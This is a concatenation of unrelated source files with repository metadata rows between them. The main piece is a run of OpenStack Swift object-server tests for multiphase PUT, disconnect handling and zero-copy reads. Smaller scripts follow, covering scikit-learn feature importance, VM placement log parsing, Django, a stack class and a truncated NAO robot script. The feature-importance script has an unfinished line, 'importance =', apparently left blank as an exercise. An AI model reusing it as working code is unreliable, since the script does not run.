def test_multiphase_put_no_mime_boundary(self):
test_data = 'obj data'
put_timestamp = utils.Timestamp(time()).internal
headers = {
'Content-Type': 'text/plain',
'X-Timestamp': put_timestamp,
'Transfer-Encoding': 'chunked',
'Expect': '100-continue',
'X-Backend-Obj-Content-Length': len(test_data),
'X-Backend-Obj-Multiphase-Commit': 'yes',
}
conn = bufferedhttp.http_connect('127.0.0.1', self.port, 'sda1', '0',
'PUT', '/a/c/o', headers=headers)
resp = conn.getexpect()
self.assertEqual(resp.status, 400)
resp.read()
resp.close()
def test_expect_on_multiphase_put_diconnect(self):
put_timestamp = utils.Timestamp(time()).internal
headers = {
'Content-Type': 'text/plain',
'X-Timestamp': put_timestamp,
'Transfer-Encoding': 'chunked',
'Expect': '100-continue',
'X-Backend-Obj-Content-Length': 0,
'X-Backend-Obj-Multipart-Mime-Boundary': 'boundary123',
'X-Backend-Obj-Multiphase-Commit': 'yes',
}
conn = bufferedhttp.http_connect('127.0.0.1', self.port, 'sda1', '0',
'PUT', '/a/c/o', headers=headers)
resp = conn.getexpect()
self.assertEqual(resp.status, 100)
headers = HeaderKeyDict(resp.getheaders())
self.assertEqual(headers['X-Obj-Multiphase-Commit'], 'yes')
conn.send('c\r\n--boundary123\r\n')
# disconnect client
conn.sock.fd._sock.close()
for i in range(2):
sleep(0)
self.assertFalse(self.logger.get_lines_for_level('error'))
for line in self.logger.get_lines_for_level('info'):
self.assertIn(' 499 ', line)
def find_files(self):
ignore_files = {'.lock', 'hashes.invalid'}
found_files = defaultdict(list)
for root, dirs, files in os.walk(self.devices):
for filename in files:
if filename in ignore_files:
continue
_name, ext = os.path.splitext(filename)
file_path = os.path.join(root, filename)
found_files[ext].append(file_path)
return found_files
@contextmanager
def _check_multiphase_put_commit_handling(self,
test_doc=None,
headers=None,
finish_body=True):
"""
This helper will setup a multiphase chunked PUT request and yield at
the context at the commit phase (after getting the second expect-100
continue response.
It can setup a reasonable stub request, but you can over-ride some
characteristics of the request via kwargs.
:param test_doc: first part of the mime conversation before the object
server will send the 100-continue, this includes the
object body
:param headers: headers to send along with the initial request; some
object-metadata (e.g. X-Backend-Obj-Content-Length)
is generally expected to match the test_doc)
:param finish_body: boolean, if true send "0\r\n\r\n" after test_doc
and wait for 100-continue before yielding context
"""
test_data = encode_frag_archive_bodies(POLICIES[1], 'obj data')[0]
footer_meta = {
"X-Object-Sysmeta-Ec-Frag-Index": "2",
"Etag": md5(test_data).hexdigest(),
}
footer_json = json.dumps(footer_meta)
footer_meta_cksum = md5(footer_json).hexdigest()
test_doc = test_doc or "\r\n".join((
"--boundary123",
"X-Document: object body",
"",
test_data,
"--boundary123",
"X-Document: object metadata",
"Content-MD5: " + footer_meta_cksum,
"",
footer_json,
"--boundary123",
))
# phase1 - PUT request with object metadata in footer and
# multiphase commit conversation
headers = headers or {
'Content-Type': 'text/plain',
'Transfer-Encoding': 'chunked',
'Expect': '100-continue',
'X-Backend-Storage-Policy-Index': '1',
'X-Backend-Obj-Content-Length': len(test_data),
'X-Backend-Obj-Metadata-Footer': 'yes',
'X-Backend-Obj-Multipart-Mime-Boundary': 'boundary123',
'X-Backend-Obj-Multiphase-Commit': 'yes',
}
put_timestamp = utils.Timestamp(headers.setdefault(
'X-Timestamp', utils.Timestamp(time()).internal))
container_update = \
'swift.obj.server.ObjectController.container_update'
with mock.patch(container_update) as _container_update:
conn = bufferedhttp.http_connect(
'127.0.0.1', self.port, 'sda1', '0',
'PUT', '/a/c/o', headers=headers)
resp = conn.getexpect()
self.assertEqual(resp.status, 100)
expect_headers = HeaderKeyDict(resp.getheaders())
to_send = "%x\r\n%s\r\n" % (len(test_doc), test_doc)
conn.send(to_send)
if finish_body:
conn.send("0\r\n\r\n")
# verify 100-continue response to mark end of phase1
resp = conn.getexpect()
self.assertEqual(resp.status, 100)
# yield relevant context for test
yield {
'conn': conn,
'expect_headers': expect_headers,
'put_timestamp': put_timestamp,
'mock_container_update': _container_update,
}
# give the object server a little time to trampoline enough to
# recognize request has finished, or socket has closed or whatever
sleep(0.1)
def test_multiphase_put_client_disconnect_right_before_commit(self):
with self._check_multiphase_put_commit_handling() as context:
conn = context['conn']
# just bail stright out
conn.sock.fd._sock.close()
put_timestamp = context['put_timestamp']
_container_update = context['mock_container_update']
# and make sure it demonstrates the client disconnect
log_lines = self.logger.get_lines_for_level('info')
self.assertEqual(len(log_lines), 1)
self.assertIn(' 499 ', log_lines[0])
# verify successful object data file write
found_files = self.find_files()
# non durable .data file is there
self.assertEqual(len(found_files['.data']), 1)
obj_datafile = found_files['.data'][0]
self.assertEqual("%s#2.data" % put_timestamp.internal,
os.path.basename(obj_datafile))
# but no other files
self.assertFalse(found_files['.data'][1:])
found_files.pop('.data')
self.assertFalse(found_files)
# And no container update
self.assertFalse(_container_update.called)
def test_multiphase_put_client_disconnect_in_the_middle_of_commit(self):
with self._check_multiphase_put_commit_handling() as context:
conn = context['conn']
# start commit confirmation to start phase2
commit_confirmation_doc = "\r\n".join((
"X-Document: put commit",
"",
"commit_confirmation",
"--boundary123--",
))
# but don't quite the commit body
to_send = "%x\r\n%s" % \
(len(commit_confirmation_doc), commit_confirmation_doc[:-1])
conn.send(to_send)
# and then bail out
conn.sock.fd._sock.close()
put_timestamp = context['put_timestamp']
_container_update = context['mock_container_update']
# and make sure it demonstrates the client disconnect
log_lines = self.logger.get_lines_for_level('info')
self.assertEqual(len(log_lines), 1)
self.assertIn(' 499 ', log_lines[0])
# verify successful object data file write
found_files = self.find_files()
# non durable .data file is there
self.assertEqual(len(found_files['.data']), 1)
obj_datafile = found_files['.data'][0]
self.assertEqual("%s#2.data" % put_timestamp.internal,
os.path.basename(obj_datafile))
# but no other files
self.assertFalse(found_files['.data'][1:])
found_files.pop('.data')
self.assertFalse(found_files)
# And no container update
self.assertFalse(_container_update.called)
def test_multiphase_put_no_metadata_replicated(self):
test_data = 'obj data'
test_doc = "\r\n".join((
"--boundary123",
"X-Document: object body",
"",
test_data,
"--boundary123",
))
put_timestamp = utils.Timestamp(time()).internal
headers = {
'Content-Type': 'text/plain',
'X-Timestamp': put_timestamp,
'Transfer-Encoding': 'chunked',
'Expect': '100-continue',
'X-Backend-Obj-Content-Length': len(test_data),
'X-Backend-Obj-Multipart-Mime-Boundary': 'boundary123',
'X-Backend-Obj-Multiphase-Commit': 'yes',
}
with self._check_multiphase_put_commit_handling(
test_doc=test_doc, headers=headers) as context:
expect_headers = context['expect_headers']
self.assertEqual(expect_headers['X-Obj-Multiphase-Commit'], 'yes')
# N.B. no X-Obj-Metadata-Footer header
self.assertNotIn('X-Obj-Metadata-Footer', expect_headers)
conn = context['conn']
# send commit confirmation to start phase2
commit_confirmation_doc = "\r\n".join((
"X-Document: put commit",
"",
"commit_confirmation",
"--boundary123--",
))
to_send = "%x\r\n%s\r\n0\r\n\r\n" % \
(len(commit_confirmation_doc), commit_confirmation_doc)
conn.send(to_send)
# verify success (2xx) to make end of phase2
resp = conn.getresponse()
self.assertEqual(resp.status, 201)
resp.read()
resp.close()
# verify successful object data file write
put_timestamp = context['put_timestamp']
found_files = self.find_files()
# .data file is there
self.assertEqual(len(found_files['.data']), 1)
obj_datafile = found_files['.data'][0]
self.assertEqual("%s.data" % put_timestamp.internal,
os.path.basename(obj_datafile))
# but no other files
self.assertFalse(found_files['.data'][1:])
found_files.pop('.data')
self.assertFalse(found_files)
# And container update was called
self.assertTrue(context['mock_container_update'].called)
def test_multiphase_put_metadata_footer(self):
with self._check_multiphase_put_commit_handling() as context:
expect_headers = context['expect_headers']
self.assertEqual(expect_headers['X-Obj-Multiphase-Commit'], 'yes')
self.assertEqual(expect_headers['X-Obj-Metadata-Footer'], 'yes')
conn = context['conn']
# send commit confirmation to start phase2
commit_confirmation_doc = "\r\n".join((
"X-Document: put commit",
"",
"commit_confirmation",
"--boundary123--",
))
to_send = "%x\r\n%s\r\n0\r\n\r\n" % \
(len(commit_confirmation_doc), commit_confirmation_doc)
conn.send(to_send)
# verify success (2xx) to make end of phase2
resp = conn.getresponse()
self.assertEqual(resp.status, 201)
resp.read()
resp.close()
# verify successful object data and durable state file write
put_timestamp = context['put_timestamp']
found_files = self.find_files()
# .data file is there
self.assertEqual(len(found_files['.data']), 1)
obj_datafile = found_files['.data'][0]
self.assertEqual("%s#2#d.data" % put_timestamp.internal,
os.path.basename(obj_datafile))
# but no other files
self.assertFalse(found_files['.data'][1:])
found_files.pop('.data')
self.assertFalse(found_files)
# And container update was called
self.assertTrue(context['mock_container_update'].called)
def test_multiphase_put_metadata_footer_disconnect(self):
test_data = 'obj data'
test_doc = "\r\n".join((
"--boundary123",
"X-Document: object body",
"",
test_data,
"--boundary123",
))
# eventlet.wsgi won't return < network_chunk_size from a chunked read
self.app.network_chunk_size = 16
with self._check_multiphase_put_commit_handling(
test_doc=test_doc, finish_body=False) as context:
conn = context['conn']
# make footer doc
footer_meta = {
"X-Object-Sysmeta-Ec-Frag-Index": "2",
"Etag": md5(test_data).hexdigest(),
}
footer_json = json.dumps(footer_meta)
footer_meta_cksum = md5(footer_json).hexdigest()
# send most of the footer doc
footer_doc = "\r\n".join((
"X-Document: object metadata",
"Content-MD5: " + footer_meta_cksum,
"",
footer_json,
))
# but don't send final boundary nor last chunk
to_send = "%x\r\n%s\r\n" % \
(len(footer_doc), footer_doc)
conn.send(to_send)
# and then bail out
conn.sock.fd._sock.close()
# and make sure it demonstrates the client disconnect
log_lines = self.logger.get_lines_for_level('info')
self.assertEqual(len(log_lines), 1)
self.assertIn(' 499 ', log_lines[0])
# no artifacts left on disk
found_files = self.find_files()
self.assertFalse(found_files)
# ... and no container update
_container_update = context['mock_container_update']
self.assertFalse(_container_update.called)
def test_multiphase_put_ec_fragment_in_headers_no_footers(self):
test_data = 'obj data'
test_doc = "\r\n".join((
"--boundary123",
"X-Document: object body",
"",
test_data,
"--boundary123",
))
# phase1 - PUT request with multiphase commit conversation
# no object metadata in footer
put_timestamp = utils.Timestamp(time()).internal
headers = {
'Content-Type': 'text/plain',
'X-Timestamp': put_timestamp,
'Transfer-Encoding': 'chunked',
'Expect': '100-continue',
# normally the frag index gets sent in the MIME footer (which this
# test doesn't have, see `test_multiphase_put_metadata_footer`),
# but the proxy *could* send the frag index in the headers and
# this test verifies that would work.
'X-Object-Sysmeta-Ec-Frag-Index': '2',
'X-Backend-Storage-Policy-Index': '1',
'X-Backend-Obj-Content-Length': len(test_data),
'X-Backend-Obj-Multipart-Mime-Boundary': 'boundary123',
'X-Backend-Obj-Multiphase-Commit': 'yes',
}
with self._check_multiphase_put_commit_handling(
test_doc=test_doc, headers=headers) as context:
expect_headers = context['expect_headers']
self.assertEqual(expect_headers['X-Obj-Multiphase-Commit'], 'yes')
# N.B. no X-Obj-Metadata-Footer header
self.assertNotIn('X-Obj-Metadata-Footer', expect_headers)
conn = context['conn']
# send commit confirmation to start phase2
commit_confirmation_doc = "\r\n".join((
"X-Document: put commit",
"",
"commit_confirmation",
"--boundary123--",
))
to_send = "%x\r\n%s\r\n0\r\n\r\n" % \
(len(commit_confirmation_doc), commit_confirmation_doc)
conn.send(to_send)
# verify success (2xx) to make end of phase2
resp = conn.getresponse()
self.assertEqual(resp.status, 201)
resp.read()
resp.close()
# verify successful object data and durable state file write
put_timestamp = context['put_timestamp']
found_files = self.find_files()
# .data file is there
self.assertEqual(len(found_files['.data']), 1)
obj_datafile = found_files['.data'][0]
self.assertEqual("%s#2#d.data" % put_timestamp.internal,
os.path.basename(obj_datafile))
# but no other files
self.assertFalse(found_files['.data'][1:])
found_files.pop('.data')
self.assertFalse(found_files)
# And container update was called
self.assertTrue(context['mock_container_update'].called)
def test_multiphase_put_bad_commit_message(self):
with self._check_multiphase_put_commit_handling() as context:
conn = context['conn']
# send commit confirmation to start phase2
commit_confirmation_doc = "\r\n".join((
"junkjunk",
"--boundary123--",
))
to_send = "%x\r\n%s\r\n0\r\n\r\n" % \
(len(commit_confirmation_doc), commit_confirmation_doc)
conn.send(to_send)
resp = conn.getresponse()
self.assertEqual(resp.status, 500)
resp.read()
resp.close()
put_timestamp = context['put_timestamp']
_container_update = context['mock_container_update']
# verify that durable data file was NOT created
found_files = self.find_files()
# non durable .data file is there
self.assertEqual(len(found_files['.data']), 1)
obj_datafile = found_files['.data'][0]
self.assertEqual("%s#2.data" % put_timestamp.internal,
os.path.basename(obj_datafile))
# but no other files
self.assertFalse(found_files['.data'][1:])
found_files.pop('.data')
self.assertFalse(found_files)
# And no container update
self.assertFalse(_container_update.called)
def test_multiphase_put_drains_extra_commit_junk(self):
with self._check_multiphase_put_commit_handling() as context:
conn = context['conn']
# send commit confirmation to start phase2
commit_confirmation_doc = "\r\n".join((
"X-Document: put commit",
"",
"commit_confirmation",
"--boundary123",
"X-Document: we got cleverer",
"",
"stuff stuff meaningless stuuuuuuuuuuff",
"--boundary123",
"X-Document: we got even cleverer; can you believe it?",
"Waneshaft: ambifacient lunar",
"Casing: malleable logarithmic",
"",
"potato potato potato potato potato potato potato",
"--boundary123--",
))
to_send = "%x\r\n%s\r\n0\r\n\r\n" % \
(len(commit_confirmation_doc), commit_confirmation_doc)
conn.send(to_send)
# verify success (2xx) to make end of phase2
resp = conn.getresponse()
self.assertEqual(resp.status, 201)
resp.read()
# make another request to validate the HTTP protocol state
conn.putrequest('GET', '/sda1/0/a/c/o')
conn.putheader('X-Backend-Storage-Policy-Index', '1')
conn.endheaders()
resp = conn.getresponse()
self.assertEqual(resp.status, 200)
resp.read()
resp.close()
# verify successful object data and durable state file write
put_timestamp = context['put_timestamp']
found_files = self.find_files()
# .data file is there
self.assertEqual(len(found_files['.data']), 1)
obj_datafile = found_files['.data'][0]
self.assertEqual("%s#2#d.data" % put_timestamp.internal,
os.path.basename(obj_datafile))
# but no other files
self.assertFalse(found_files['.data'][1:])
found_files.pop('.data')
self.assertFalse(found_files)
# And container update was called
self.assertTrue(context['mock_container_update'].called)
def test_multiphase_put_drains_extra_commit_junk_disconnect(self):
commit_confirmation_doc = "\r\n".join((
"X-Document: put commit",
"",
"commit_confirmation",
"--boundary123",
"X-Document: we got cleverer",
"",
"stuff stuff meaningless stuuuuuuuuuuff",
"--boundary123",
"X-Document: we got even cleverer; can you believe it?",
"Waneshaft: ambifacient lunar",
"Casing: malleable logarithmic",
"",
"potato potato potato potato potato potato potato",
))
# eventlet.wsgi won't return < network_chunk_size from a chunked read
self.app.network_chunk_size = 16
with self._check_multiphase_put_commit_handling() as context:
conn = context['conn']
# send commit confirmation and some other stuff
# but don't send final boundary or last chunk
to_send = "%x\r\n%s\r\n" % \
(len(commit_confirmation_doc), commit_confirmation_doc)
conn.send(to_send)
# and then bail out
conn.sock.fd._sock.close()
# and make sure it demonstrates the client disconnect
log_lines = self.logger.get_lines_for_level('info')
self.assertEqual(len(log_lines), 1)
self.assertIn(' 499 ', log_lines[0])
# verify successful object data and durable state file write
put_timestamp = context['put_timestamp']
found_files = self.find_files()
# .data file is there
self.assertEqual(len(found_files['.data']), 1)
obj_datafile = found_files['.data'][0]
self.assertEqual("%s#2#d.data" % put_timestamp.internal,
os.path.basename(obj_datafile))
# but no other files
self.assertFalse(found_files['.data'][1:])
found_files.pop('.data')
self.assertFalse(found_files)
# but no container update
self.assertFalse(context['mock_container_update'].called)
@patch_policies
class TestZeroCopy(unittest.TestCase):
"""Test the object server's zero-copy functionality"""
def _system_can_zero_copy(self):
if not splice.available:
return False
try:
utils.get_md5_socket()
except IOError:
return False
return True
def setUp(self):
if not self._system_can_zero_copy():
raise SkipTest("zero-copy support is missing")
self.testdir = mkdtemp(suffix="obj_server_zero_copy")
mkdirs(os.path.join(self.testdir, 'sda1', 'tmp'))
conf = {'devices': self.testdir,
'mount_check': 'false',
'splice': 'yes',
'disk_chunk_size': '4096'}
self.object_controller = object_server.ObjectController(
conf, logger=debug_logger())
self.df_mgr = diskfile.DiskFileManager(
conf, self.object_controller.logger)
listener = listen_zero()
port = listener.getsockname()[1]
self.wsgi_greenlet = spawn(
wsgi.server, listener, self.object_controller, NullLogger())
self.http_conn = httplib.HTTPConnection('127.0.0.1', port)
self.http_conn.connect()
def tearDown(self):
"""Tear down for testing swift.object.server.ObjectController"""
self.wsgi_greenlet.kill()
rmtree(self.testdir)
def test_GET(self):
url_path = '/sda1/2100/a/c/o'
self.http_conn.request('PUT', url_path, 'obj contents',
{'X-Timestamp': '127082564.24709',
'Content-Type': 'application/test'})
response = self.http_conn.getresponse()
self.assertEqual(response.status, 201)
response.read()
self.http_conn.request('GET', url_path)
response = self.http_conn.getresponse()
self.assertEqual(response.status, 200)
contents = response.read()
self.assertEqual(contents, 'obj contents')
def test_GET_big(self):
# Test with a large-ish object to make sure we handle full socket
# buffers correctly.
obj_contents = 'A' * 4 * 1024 * 1024 # 4 MiB
url_path = '/sda1/2100/a/c/o'
self.http_conn.request('PUT', url_path, obj_contents,
{'X-Timestamp': '1402600322.52126',
'Content-Type': 'application/test'})
response = self.http_conn.getresponse()
self.assertEqual(response.status, 201)
response.read()
self.http_conn.request('GET', url_path)
response = self.http_conn.getresponse()
self.assertEqual(response.status, 200)
contents = response.read()
self.assertEqual(contents, obj_contents)
def test_quarantine(self):
obj_hash = hash_path('a', 'c', 'o')
url_path = '/sda1/2100/a/c/o'
ts = '1402601849.47475'
self.http_conn.request('PUT', url_path, 'obj contents',
{'X-Timestamp': ts,
'Content-Type': 'application/test'})
response = self.http_conn.getresponse()
self.assertEqual(response.status, 201)
response.read()
# go goof up the file on disk
fname = os.path.join(self.testdir, 'sda1', 'objects', '2100',
obj_hash[-3:], obj_hash, ts + '.data')
with open(fname, 'rb+') as fh:
fh.write('XYZ')
self.http_conn.request('GET', url_path)
response = self.http_conn.getresponse()
self.assertEqual(response.status, 200)
contents = response.read()
self.assertEqual(contents, 'XYZ contents')
self.http_conn.request('GET', url_path)
response = self.http_conn.getresponse()
# it was quarantined by the previous request
self.assertEqual(response.status, 404)
response.read()
def test_quarantine_on_well_formed_zero_byte_file(self):
# Make sure we work around an oddity in Linux's hash sockets
url_path = '/sda1/2100/a/c/o'
ts = '1402700497.71333'
self.http_conn.request(
'PUT', url_path, '',
{'X-Timestamp': ts, 'Content-Length': '0',
'Content-Type': 'application/test'})
response = self.http_conn.getresponse()
self.assertEqual(response.status, 201)
response.read()
self.http_conn.request('GET', url_path)
response = self.http_conn.getresponse()
self.assertEqual(response.status, 200)
contents = response.read()
self.assertEqual(contents, '')
self.http_conn.request('GET', url_path)
response = self.http_conn.getresponse()
self.assertEqual(response.status, 200) # still there
contents = response.read()
self.assertEqual(contents, '')
class TestConfigOptionHandling(unittest.TestCase):
def setUp(self):
self.tmpdir = mkdtemp()
def tearDown(self):
rmtree(self.tmpdir)
def _app_config(self, config):
contents = dedent(config)
conf_file = os.path.join(self.tmpdir, 'object-server.conf')
with open(conf_file, 'w') as f:
f.write(contents)
return init_request_processor(conf_file, 'object-server')[:2]
def test_default(self):
config = """
[DEFAULT]
[pipeline:main]
pipeline = object-server
[app:object-server]
use = egg:swift#object
"""
app, config = self._app_config(config)
self.assertNotIn('reclaim_age', config)
for policy in POLICIES:
self.assertEqual(app._diskfile_router[policy].reclaim_age, 604800)
def test_option_in_app(self):
config = """
[DEFAULT]
[pipeline:main]
pipeline = object-server
[app:object-server]
use = egg:swift#object
reclaim_age = 100
"""
app, config = self._app_config(config)
self.assertEqual(config['reclaim_age'], '100')
for policy in POLICIES:
self.assertEqual(app._diskfile_router[policy].reclaim_age, 100)
def test_option_in_default(self):
config = """
[DEFAULT]
reclaim_age = 200
[pipeline:main]
pipeline = object-server
[app:object-server]
use = egg:swift#object
"""
app, config = self._app_config(config)
self.assertEqual(config['reclaim_age'], '200')
for policy in POLICIES:
self.assertEqual(app._diskfile_router[policy].reclaim_age, 200)
def test_option_in_both(self):
config = """
[DEFAULT]
reclaim_age = 300
[pipeline:main]
pipeline = object-server
[app:object-server]
use = egg:swift#object
reclaim_age = 400
"""
app, config = self._app_config(config)
self.assertEqual(config['reclaim_age'], '300')
for policy in POLICIES:
self.assertEqual(app._diskfile_router[policy].reclaim_age, 300)
# use paste "set" syntax to override global config value
config = """
[DEFAULT]
reclaim_age = 500
[pipeline:main]
pipeline = object-server
[app:object-server]
use = egg:swift#object
set reclaim_age = 600
"""
app, config = self._app_config(config)
self.assertEqual(config['reclaim_age'], '600')
for policy in POLICIES:
self.assertEqual(app._diskfile_router[policy].reclaim_age, 600)
if __name__ == '__main__':
unittest.main()
| [
"gongwayne@hotmail.com"
] | gongwayne@hotmail.com |
e83ef981ade8159a74fb28725be34ea4e32f12bb | 0464dbe98f9cbde449a0cdc53460df8871ff0410 | /MachineLearningAndAIFoundationsValueEstimations/Ex_Files_Machine_Learning_EssT_ValueEstimate/Exercise Files/Chapter 6/feature_selection.py | decec26f727f4ecd64cf56cf49922e68a9a2b9b8 | [] | no_license | Gurubux/LinkedIn-Learn | 6ad2cde76aa6012ea5795c4478a5186dd83bcfa6 | a7625ca289f5b75ca1d65777e929f5adbdba553d | refs/heads/master | 2022-05-22T04:10:52.001252 | 2022-05-01T16:27:57 | 2022-05-01T16:27:57 | 194,151,321 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,919 | py | import numpy as np
from sklearn.externals import joblib
# These are the feature labels from our data set
feature_labels = np.array(['year_built', 'stories', 'num_bedrooms', 'full_bathrooms', 'half_bathrooms', 'livable_sqft', 'total_sqft', 'garage_sqft', 'carport_sqft', 'has_fireplace', 'has_pool', 'has_central_heating', 'has_central_cooling', 'garage_type_attached', 'garage_type_detached', 'garage_type_none', 'city_Amystad', 'city_Brownport', 'city_Chadstad', 'city_Clarkberg', 'city_Coletown', 'city_Davidfort', 'city_Davidtown', 'city_East Amychester', 'city_East Janiceville', 'city_East Justin', 'city_East Lucas', 'city_Fosterberg', 'city_Hallfort', 'city_Jeffreyhaven', 'city_Jenniferberg', 'city_Joshuafurt', 'city_Julieberg', 'city_Justinport', 'city_Lake Carolyn', 'city_Lake Christinaport', 'city_Lake Dariusborough', 'city_Lake Jack', 'city_Lake Jennifer', 'city_Leahview', 'city_Lewishaven', 'city_Martinezfort', 'city_Morrisport', 'city_New Michele', 'city_New Robinton', 'city_North Erinville', 'city_Port Adamtown', 'city_Port Andrealand', 'city_Port Daniel', 'city_Port Jonathanborough', 'city_Richardport', 'city_Rickytown', 'city_Scottberg', 'city_South Anthony', 'city_South Stevenfurt', 'city_Toddshire', 'city_Wendybury', 'city_West Ann', 'city_West Brittanyview', 'city_West Gerald', 'city_West Gregoryview', 'city_West Lydia', 'city_West Terrence'])
# Load the trained model created with train_model.py
model = joblib.load('trained_house_classifier_model.pkl')
# Create a numpy array based on the model's feature importances
importance =
# Sort the feature labels based on the feature importance rankings from the model
feauture_indexes_by_importance = importance.argsort()
# Print each feature label, from most important to least important (reverse order)
for index in feauture_indexes_by_importance:
print("{} - {:.2f}%".format(feature_labels[index], (importance[index] * 100.0)))
| [
"d_gurbux@yahoo.com"
] | d_gurbux@yahoo.com |
ccd95d42aaf08c0741f3019bcbc7eb7649bdcbc6 | ba3168d4b6932fc73d9fb8aa83a02a31e536e096 | /courses/BigData/tutorial/tutorial4/vector_dule.py | a855758d89631704118f272af40bef8f943b2fd7 | [] | no_license | xuhappy/xuhappy.github.io | dce02b72920e6997c1695a54b54c84dfb2991f85 | 63a01fd23b7688a6497a6063e318a5b6412710e2 | refs/heads/master | 2023-02-21T16:54:32.622865 | 2023-02-15T11:59:05 | 2023-02-15T11:59:05 | 78,627,996 | 5 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,791 | py | # -*- coding: utf-8 -*-
"""
Spyder Editor
This is a temporary script file.
"""
#import xlwt
import numpy as np
path="./data/parsec_2.log"
kvmcpu=16
kvmmem=16
nodecore=32
nodemem=1
cache_l3=1
imp1=225
imp2=113
def kvmvec(place,kvm):
vec=[]
placement = []
vmnumber=int(len(place)/2)
nodelist=place[:vmnumber]
memlist=place[vmnumber:]
vec.append(kvmcpu)
if kvm in place[0] and kvm in place[1]:
placement.append(2)
elif kvm in place[0]:
placement.append(0)
else:
placement.append(1)
if kvm in place[2] and kvm in place[3]:
placement.append(2)
elif kvm in place[2]:
placement.append(0)
else:
placement.append(1)
for item in nodelist:
if kvm in item:
vec.append(nodecore)
else:
vec.append(0)
vec.append(kvmmem)
for item in memlist:
if kvm in item:
vec.append(nodemem/(len(item)-1))
else:
vec.append(0)
for item in memlist:
if kvm in item:
vec.append(cache_l3/(len(item)-1))
else:
vec.append(0)
#print(vec)
return vec, placement
def kvmipc(counters):
ipc=0.0
vmnumber=int(len(counters)/2)
cyl=counters[:vmnumber]
ins=counters[vmnumber:]
for index in range(len(cyl)):
cylnum=cyl[index].replace(',','')
insnum=ins[index].replace(',','')
#print(insnum)
#ipc+= float(insnum)/float(cylnum)
ipc+=float(insnum)/3
return ipc/3
def main():
try:
file = open(path, 'r')
except:
print("open error")
data=[]
placement = []
num=0
numline = 0
for line in file.readlines():
# 处理资源向量
if len(line) == 1:
break
if num==0:
ipc=0
place=line.split('-')
print(place)
del place[0]
#print(len(line))
#print(place)
vec_a,place_a=kvmvec(place,'A')
vec_b,place_b=kvmvec(place,'B')
vec_c,place_c=kvmvec(place,'C')
num=num+ 1
# 处理ipc
else:
counters=line.split(' ')
#print(counters)
ipc+= kvmipc(counters)
if numline == 729:
print(ipc)
num=num+1
if num==6:
numline = numline + 1
vec=vec_a+vec_b+vec_c
place = place_a + place_b + place_c
#print(ipc/5)
vec.append(ipc/5)
#place.append(ipc/5)
data.append(vec)
placement.append(place)
num=0
#处理icp与自由调度的比值,以及2个重要placement
# ipc_imp1=data[imp1][-1]
# ipc_imp2=data[imp2][-1]
for index in range(len(data)):
ipc_raito=data[index][-1]/data[-1][-1]
# important1_ipc=ipc_imp1/data[-1][-1]
# important2_ipc=ipc_imp2/data[-1][-1]
del data[index][-1]
# data[index].append(important1_ipc)
# data[index].append(important2_ipc)
data[index].append(ipc_raito)
placement[index].append(ipc_raito)
# print(placement[index])
data_train=np.array(data)
f1 = open('./data/placementlog.txt','w')
for fp in placement:
f1.write(str(fp))
f1.write('\n')
# f1.write(placement)
f1.close()
placement_train=np.array(placement)
print(placement_train)
# np.save('./data/train2',data_train)
np.save('./data/placement_train',placement_train)
if __name__ == '__main__':
main()
| [
"xu900611@163.com"
] | xu900611@163.com |
0801f7f90f0e933d99852bb658048de229aa47bd | 16c1ec9ef98198a13c3b8288867a1249ef381724 | /foreground/models.py | d461acf80bb90679613390a2e948646598ec238c | [] | no_license | GKrator/sbx | be476e0fe155a0fbc5260c4950a6b4543babd7aa | d59ad98a0785557e44256344059f5d7037e4716c | refs/heads/master | 2021-01-17T11:24:44.788435 | 2016-07-11T14:31:31 | 2016-07-11T14:31:31 | 59,398,793 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 253 | py | from django.db import models
# Create your models here.
class Person(models.Model):
name = models.CharField(max_length=30)
email = models.CharField(max_length=30)
subject = models.CharField(max_length=30)
message = models.CharField(max_length=255)
| [
"iamxifan@163.com"
] | iamxifan@163.com |
4ec59db94642f82eb9818ed5ac9f887f33b389ee | c75c6e331b965274e888383b053eaa1041310e7d | /learn/algorithms/stack.py | ef750aa72855fb4e05d64b1e590d267b2ddef2e8 | [] | no_license | poleha/py_examples | d8f0b418bbd1da796a6a5a5943d0727e5af2bafc | 2b272e2f76dcd892be628483ed7df0721c525dd7 | refs/heads/master | 2020-12-20T23:40:51.144546 | 2017-11-07T06:22:36 | 2017-11-07T06:22:36 | 56,224,323 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 577 | py | class Stack:
def __init__(self):
self.items = []
def isEmpty(self):
return self.items == []
def push(self, item):
self.items.append(item)
def pop(self):
return self.items.pop()
def peek(self):
return self.items[len(self.items) - 1]
def size(self):
return len(self.items)
def __str__(self):
return str(self.items)
def __iter__(self):
return self
def __next__(self):
try:
return self.pop()
except IndexError:
raise StopIteration
| [
"pass1191"
] | pass1191 |
ac19680243ea502dad7cc96ee6667e26441ba9f8 | 3040fb6c84b42335ad6cda8ee3cc0e1c8c88f18e | /polls_app/mysite/mysite/urls.py | b537d76b031806e77f1dd979c7480b0b4f1b35fa | [] | no_license | KhusniddinovUz/Django | 9ef59d4cabedb933b3cd685cb803463027c1a2c2 | 387d682069bd12d7ecb8aeabeb3f3b0b699199ef | refs/heads/master | 2023-08-02T06:10:21.360575 | 2021-09-19T11:55:18 | 2021-09-19T11:55:18 | 315,987,764 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 163 | py | from django.contrib import admin
from django.urls import path, include
urlpatterns = [
path('', include('polls.urls')),
path('admin/', admin.site.urls)
]
| [
"khusniddinovuz@gmail.com"
] | khusniddinovuz@gmail.com |
682c3006239ca02d254b7791ca951c15dbe875dc | cd931198652185627b0bd5a13594a5bf4abe952b | /src/testing/hello_detection.py | 72208a85714c536a9421233317a34f7af44b967a | [
"MIT"
] | permissive | qu0b/AST | dfce63155faa7912f76e71434da907f5c2c55a33 | 5767dc5de6af92659fee91d1724f6d7b7eb1f521 | refs/heads/master | 2021-03-24T12:29:44.377996 | 2018-01-30T11:39:33 | 2018-01-30T11:39:33 | 108,642,838 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,791 | py | # -*- encoding: UTF-8 -*-
""" Say 'hello, you' each time a human face is detected
"""
import sys
import time
import json
import requests
from naoqi import ALProxy
from naoqi import ALBroker
from naoqi import ALModule
from optparse import OptionParser
import xml.etree.ElementTree as ET
def excell():
root = ET.parse('parse.xml')
configs = []
moods = []
for elem in root.findall("//connector/from[@instance='NAO red']/../to"):
# How to make decisions based on attributes even in 2.6:
moods.append(elem.attrib['instance'])
for mood in moods:
